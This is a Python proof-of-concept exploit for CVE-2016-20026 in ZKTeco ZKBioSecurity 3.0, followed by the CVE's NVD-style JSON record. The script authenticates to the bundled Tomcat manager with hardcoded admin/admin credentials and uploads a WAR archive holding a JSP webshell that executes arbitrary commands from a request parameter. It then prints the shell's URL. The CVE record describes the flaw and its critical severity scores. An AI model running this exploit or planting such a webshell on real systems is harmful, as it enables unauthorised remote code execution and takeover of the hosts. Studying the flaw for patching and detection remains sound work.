CVE-2016-20026

import requests import sys # CVE-2016-20026 PoC - ZKTeco ZKBioSecurity Hardcoded Credentials RCE # Target: ZKTeco ZKBioSecurity 3.0 with bundled Apache Tomcat TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "http://target-server" TOMCAT_MANAGER_URL = f"{TARGET_HOST}:8080/manager/html/upload" # Hardcoded credentials typically found in tomcat-users.xml USERNAME = "admin" PASSWORD = "admin" def create_malicious_war(): """Generate JSP webshell WAR file for exploitation""" jsp_shell = '''<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); BufferedReader br = new BufferedReader(new InputStreamReader(in)); String line; while((line = br.readLine()) != null) { out.println(line); } } %>''' import zipfile import io war_buffer = io.BytesIO() with zipfile.ZipFile(war_buffer, 'w', zipfile.ZIP_DEFLATED) as war: war.writestr('shell.jsp', jsp_shell) return war_buffer.getvalue() def exploit(): """Execute the exploit to upload malicious WAR and gain RCE""" session = requests.Session() # Step 1: Authenticate with hardcoded credentials auth = requests.auth.HTTPBasicAuth(USERNAME, PASSWORD) # Step 2: Upload malicious WAR file files = {'deployWar': ('malicious.war', create_malicious_war(), 'application/octet-stream')} try: response = session.post(TOMCAT_MANAGER_URL, auth=auth, files=files, timeout=30) if response.status_code == 200: print("[+] Successfully uploaded malicious WAR file!") print("[+] Access shell at: /shell/shell.jsp?cmd=whoami") else: print("[-] Exploitation failed - credentials may have been changed") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": print("CVE-2016-20026 ZKTeco ZKBioSecurity Exploit") exploit()

{"cve": {"id": "CVE-2016-20026", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:48.777", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains hardcoded credentials in the bundled Apache Tomcat server that allow unauthenticated attackers to access the manager application. Attackers can authenticate with hardcoded credentials stored in tomcat-users.xml to upload malicious WAR archives containing JSP applications and execute arbitrary code with SYSTEM privileges."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene credenciales codificadas en el servidor Apache Tomcat incluido que permiten a atacantes no autenticados acceder a la aplicación de gestión. Los atacantes pueden autenticarse con credenciales codificadas almacenadas en tomcat-users.xml para cargar archivos WAR maliciosos que contienen aplicaciones JSP y ejecutar código arbitrario con privilegios de SISTEMA."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016080266", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116484", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138567", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40324/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-hardcoded-credentials-remote-code-execution", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php", "source": "[email protected]"}]}}